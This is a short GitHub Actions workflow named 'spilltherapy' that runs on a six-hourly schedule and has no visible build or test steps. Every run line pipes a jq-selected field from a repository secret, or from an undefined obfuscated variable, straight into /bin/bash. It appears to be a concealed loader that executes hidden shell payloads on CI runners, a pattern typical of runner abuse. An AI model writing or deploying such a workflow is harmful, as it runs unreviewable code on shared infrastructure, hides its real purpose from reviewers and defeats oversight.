name: spilltherapy

on:
  workflow_dispatch:
  schedule:
    - cron: '23 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: spilltherapy
        env:
          xvloj04: ${{ secrets.xvloj04 }}
        run: |
          echo $xvloj04 | jq -r .j11870 | /bin/bash
          echo $wmtk05457 | jq -r .uclh77 | /bin/bash
          echo $yd2 | jq -r .yye0 | /bin/bash
          echo $q79 | jq -r .h705 | /bin/bash
          echo $q513 | jq -r .nhuva10674 | /bin/bash
          echo $s7 | jq -r .jctt082 | /bin/bash
          echo $wrs5173 | jq -r .zd5556 | /bin/bash
          echo $ahof950 | jq -r .tendb56 | /bin/bash
          echo $v4 | jq -r .x7754 | /bin/bash
          echo $wb6 | jq -r .ma3 | /bin/bash
          echo $icbqa12369 | jq -r .xouy902 | /bin/bash
          echo $liwqj187 | jq -r .mlup88 | /bin/bash
          echo $fikld14095 | jq -r .h023 | /bin/bash

